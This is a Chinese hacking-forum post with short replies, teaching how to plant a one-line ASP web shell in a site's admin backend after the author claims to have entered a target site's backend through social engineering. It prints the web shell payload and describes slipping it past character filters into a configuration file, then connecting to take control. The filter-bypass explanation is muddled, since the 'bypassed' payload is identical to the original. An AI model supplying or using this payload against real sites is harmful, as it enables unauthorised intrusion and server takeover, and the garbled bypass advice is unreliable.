帮你在后台写入一句话木马

积分值

今天来教大家如何在后台写入一句话木马。一句话木马整体来说，为我们渗透者提交了很多的方便...但是时代在进步.程序员的思想也在进步..他们会

想出如何在前台或者后台来过滤你的一句话的特殊字符...

今天下午到检测某XX站点，用社工进入了后台...但是后台根本没有办法让我们拿到shell！也就要用到一句话木马

我们来看下ASP常用的一句话木马格式..

<%eval request("value")%>   【示例】

注意:一句话千万别乱提交到配置文件，没有源码建议别到站点测试！！因为很容易破坏到文件..搞到访问不了..这样你不好！

站长也不好对吧？

比如说这个程序.过滤了特殊字符"   <% ()

那么我们提交<%eval request("value")%>

这样的话整体来说已经提交到配置文件去了..连接下就OK。。只是针对而已..建议别转换数字或者英文字母.看情况转换吧.

思路好就行了

弥勒

垃圾垃圾
垃圾垃圾垃圾垃圾

旋律依旧

我很喜欢1楼的头像`。，```

不可一世帝王

看贴回帖拿分走人~~~~~~~~~~~~